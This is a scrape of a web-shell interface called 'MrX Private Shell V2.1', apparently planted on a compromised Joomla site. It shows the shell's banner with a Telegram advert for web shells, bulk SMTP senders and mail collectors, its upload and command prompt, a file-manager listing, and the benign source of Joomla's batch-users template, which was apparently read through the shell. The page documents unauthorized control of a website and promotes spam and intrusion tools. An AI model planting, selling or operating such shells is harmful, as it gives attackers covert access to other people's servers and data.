__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * @package     Joomla.Administrator
 * @subpackage  com_users
 *
 * @copyright   (C) 2015 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;

// Create the copy/move options.
$options = [
    HTMLHelper::_('select.option', 'add', Text::_('COM_USERS_BATCH_ADD')),
    HTMLHelper::_('select.option', 'del', Text::_('COM_USERS_BATCH_DELETE')),
    HTMLHelper::_('select.option', 'set', Text::_('COM_USERS_BATCH_SET'))
];

// Create the reset password options.
$resetOptions = [
    HTMLHelper::_('select.option', '', Text::_('COM_USERS_NO_ACTION')),
    HTMLHelper::_('select.option', 'yes', Text::_('JYES')),
    HTMLHelper::_('select.option', 'no', Text::_('JNO'))
];

/** @var Joomla\CMS\WebAsset\WebAssetManager $wa */
$wa = $this->document->getWebAssetManager();
$wa->useScript('joomla.batch-copymove');

?>

<div class="p-3">
    <form>
        <div class="form-group">
            <label id="batch-choose-action-lbl" class="control-label" for="batch-group-id">
                <?php echo Text::_('COM_USERS_BATCH_GROUP'); ?>
            </label>
            <div id="batch-choose-action" class="combo controls">
                <select class="form-select" name="batch[group_id]" id="batch-group-id">
                    <option value=""><?php echo Text::_('JSELECT'); ?></option>
                    <?php echo HTMLHelper::_('select.options', HTMLHelper::_('user.groups')); ?>
                </select>
            </div>
        </div>
        <div class="form-group">
            <fieldset>
                <legend>
                    <?php echo Text::_('COM_USERS_BATCH_ACTIONS'); ?>
                </legend>
                <?php echo HTMLHelper::_('select.radiolist', $options, 'batch[group_action]', '', 'value', 'text', 'add'); ?>
            </fieldset>
        </div>
        <div class="form-group">
            <fieldset id="batch-password-reset_id">
                <legend>
                    <?php echo Text::_('COM_USERS_REQUIRE_PASSWORD_RESET'); ?>
                </legend>
                <?php echo HTMLHelper::_('select.radiolist', $resetOptions, 'batch[reset_id]', '', 'value', 'text', ''); ?>
            </fieldset>
        </div>
    </form>
</div>

Filemanager

Name Type Size Permission Actions
default.php File 14.55 KB 0664
default.xml File 200 B 0664
default_batch_body.php File 2.31 KB 0664
default_batch_footer.php File 647 B 0664
modal.php File 5.85 KB 0664
Filemanager